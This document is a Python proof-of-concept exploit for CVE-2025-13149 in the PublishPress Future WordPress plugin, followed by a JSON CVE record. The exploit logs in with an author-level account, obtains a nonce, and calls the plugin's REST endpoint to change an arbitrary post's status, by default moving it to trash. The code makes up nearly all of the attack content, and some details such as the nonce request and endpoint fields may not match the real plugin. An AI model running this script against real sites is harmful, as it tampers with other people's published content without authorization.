CVE-2025-13149

import requests import sys # CVE-2025-13149 PoC - PublishPress Future Unauthorized Post Status Modification # Target: WordPress site with PublishPress Future plugin <= 4.9.1 # Authenticated attacker with author+ role can modify arbitrary post status target_url = sys.argv[1] if len(sys.argv) > 1 else "http://target-wordpress-site.com" username = sys.argv[2] if len(sys.argv) > 2 else "attacker" password = sys.argv[3] if len(sys.argv) > 3 else "password" # Step 1: Authenticate and get nonce session = requests.Session() login_url = f"{target_url}/wp-login.php" login_data = {"log": username, "pwd": password, "wp-submit": "Log In"} resp = session.post(login_url, data=login_data) # Step 2: Get WordPress nonce for REST API nonce_url = f"{target_url}/wp-admin/admin-ajax.php?action=rest-nonce" nonce_resp = session.get(nonce_url) nonce = nonce_resp.text.strip() # Step 3: Exploit - Modify target post status via REST API # Target post_id to modify (any post ID) target_post_id = 123 new_status = "trash" # Options: draft, publish, trash, private, etc. api_url = f"{target_url}/wp-json/publishpress-future/v1/save" exploit_data = { "postId": target_post_id, "newStatus": new_status, "nonce": nonce } resp = session.post(api_url, json=exploit_data) print(f"Status Code: {resp.status_code}") print(f"Response: {resp.text}") if resp.status_code == 200: print(f"[+] Successfully modified post {target_post_id} to status: {new_status}") else: print("[-] Exploitation failed")

{"cve": {"id": "CVE-2025-13149", "sourceIdentifier": "[email protected]", "published": "2025-11-21T09:15:46.710", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Schedule Post Changes With PublishPress Future: Unpublish, Delete, Change Status, Trash, Change Categories plugin for WordPress is vulnerable to unauthorized modification of data due to a missing authorization check on the \"saveFutureActionData\" function in all versions up to, and including, 4.9.1. This makes it possible for authenticated attackers, with author level access and above, to change the status of arbitrary posts and pages via the REST API endpoint."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://github.com/publishpress/publishpress-future/commit/0cbefc1632c6f1fffc5fa0ca85e6b8a641d41c7f", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/82ea0ebc-08aa-4ef5-b6b1-c7c13715ef6d?source=cve", "source": "[email protected]"}]}}